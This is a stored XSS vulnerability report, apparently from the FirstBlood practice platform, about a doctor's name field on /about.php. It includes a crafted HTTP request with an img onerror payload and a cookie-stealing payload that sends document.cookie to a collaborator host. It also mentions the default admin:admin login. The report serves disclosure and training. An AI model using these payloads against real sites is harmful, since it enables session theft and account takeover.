FirstBlood-#1576Stored XSS on about.php's doctor of the month field
This issue was discovered on FirstBlood v3



On 2022-12-11, 0xblackbird Level 5 reported:

Summary:

Hi mate!

I hope you're doing great today!

I found a stored XSS vulnerability on /about.php. The doctor of the month' name parameter is reflected in the source code without being filtered or escaped correctly. This means we only need to change the name of doctor Jon's name to an XSS payload.

Possible cause:

The developers thought that there was no way to change the path of the profile picture but forgot that invoking the API directly is still an option.

Impact:

I was able to execute javascript code on any user's/doctor's behalf. Even more, I was also able to steal the sensitive session cookie as it is not an HTTPOnly cookie. This allowed me to successfully take over the account of the doctor.

Steps to reproduce:

1) Login using the default credentials: admin:admin:

2) Next, replicate the following request:

POST /drpanel/drapi/edit-dr.php HTTP/1.1
Host: {HOST}
Cookie: drps={SESS_COOKIE}
Content-Type: application/x-www-form-urlencoded
drid=3&name=xyz"><img src="x" onerror="alert(document.domain)"&bio=&bookable=0

3) Finally, visit /about.php. A popup should be displayed with the document's domain:

We can elevate our privileges by easily taking over the doctor's account as cookies are not set to be HTTPOnly. To do so, we could put the following payload in the phone parameter to steal and send the cookies back to us:

xyz"><img src="x" onerror="location.href=`//{BURP_COLLABORATOR}/collector?cookies=${document.cookie}`"

Next, visit the endpoint again: /about.php

Upon visiting the URL (as the victim), we can see a hit with the cookies on our server:

Mitigation

I highly recommend encoding any user input and validating it before reflecting it in the response.

Kind regards,

0xblackbird

P2 High

Endpoint: /about.php

Parameter: name

Payload: "><img src="x" onerror="alert(document.domain)"


FirstBlood ID: 56
Vulnerability Type: Stored XSS

It is possible to achieve stored XSS on the /about.php endpoint via a malicious doctors name